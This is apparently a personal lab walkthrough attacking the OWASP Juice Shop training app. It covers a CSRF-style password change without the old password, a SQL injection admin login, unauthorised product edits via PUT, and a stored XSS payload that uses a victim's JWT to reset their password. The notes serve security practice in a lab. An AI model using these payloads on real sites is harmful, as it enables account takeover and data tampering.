Friday, December 31, 2021

cross site request forgery + API xss + SQL injection

download juice shop @

install nodejs 
node -v                                                            

cd /home/kali/Downloads/juice-shop-master/   
npm install
npm start

create account -> log in

start burpsuit -> turn off intercept -> login is scanned in http history

after logged in, navigate to change password page
enter old and new passwords

GET /rest/user/change-password?current=115500&new=abcde&repeat=abcde
right click on change password request -> send to repeater

change GET /rest/user/change-password?current=115500&new=abcde&repeat=abcde
to GET /rest/user/change-password?new=abcde&repeat=abcde

response 200 shows once user logged, password can be changed without old password

login as admin through sql injection
{"email":"' or 1=1 --","password":""}

send api/Quantities to repeater
change Get /api/Quantities to api/Products -> send

change GET to OPTIONS -> obtain PUT request is allowed

change request to PUT /api/Products/1
add Content-Type: application/json

in the bottom add json {"description": "hacked juice"}
response shows description updated

verify hacked juice is in description on website

inspect website and find JWT is in local storage

API xss
using admin JWT, inject script in 1st product description in PUT /api/Products/1

{"description":"hacked juice <iframe src=\"javascript:var xmlhttp = new XMLHttpRequest();'GET', 'http://localhost:3000/rest/user/change-password?new=123321&repeat=123321');xmlhttp.setRequestHeader('Authorization', 'Bearer ' + window.localStorage.token); xmlhttp.send(); alert('password hacked to 123321')\">"}

login as bob with password abcde

bob clicked 1st product, his login password is changed

log bob in again with new password

bob is logged in with forged password

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